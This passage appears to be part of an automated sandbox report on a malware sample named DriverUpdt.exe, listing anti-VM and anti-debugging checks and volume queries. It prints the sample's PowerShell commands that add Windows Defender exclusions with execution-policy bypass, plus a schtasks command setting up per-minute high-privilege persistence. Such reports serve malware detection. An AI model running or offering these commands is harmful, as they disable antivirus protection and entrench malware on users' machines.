                      Source: C:\Users\user\Desktop\DriverUpdt.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\Desktop\DriverUpdt.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtThread delayed: delay time: 922337203685477
                      Source: DriverUpdt.0.drBinary or memory string: vmware
                      Source: svchost.exe, 00000012.00000002.3277939813.000001BA75A54000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.3277339892.000001BA75A42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.3273129280.000001BA7042B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: DriverUpdt.exe, 00000000.00000002.3313153105.000000001BEA2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess information queried: ProcessInformationJump to behavior

                      Anti Debugging

                      barindex
                      Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                      Source: C:\Users\user\Desktop\DriverUpdt.exeCode function: 0_2_00007FF848F0764A CheckRemoteDebuggerPresent,0_2_00007FF848F0764A
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\DriverUpdt.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Adds a directory exclusion to Windows Defender
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\DriverUpdt.exe'
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\DriverUpdt'
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\DriverUpdt.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\DriverUpdt'Jump to behavior
                      Bypasses PowerShell execution policy
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\DriverUpdt.exe'
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\DriverUpdt.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'DriverUpdt.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\DriverUpdt'Jump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'DriverUpdt'Jump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "DriverUpdt" /tr "C:\Users\user\AppData\Roaming\DriverUpdt"Jump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeQueries volume information: C:\Users\user\Desktop\DriverUpdt.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DriverUpdt.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtQueries volume information: C:\Users\user\AppData\Roaming\DriverUpdt VolumeInformation
                      Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                      Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
                      Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                      Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
                      Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtQueries volume information: C:\Users\user\AppData\Roaming\DriverUpdt VolumeInformation
                      Source: C:\Users\user\Desktop\DriverUpdt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
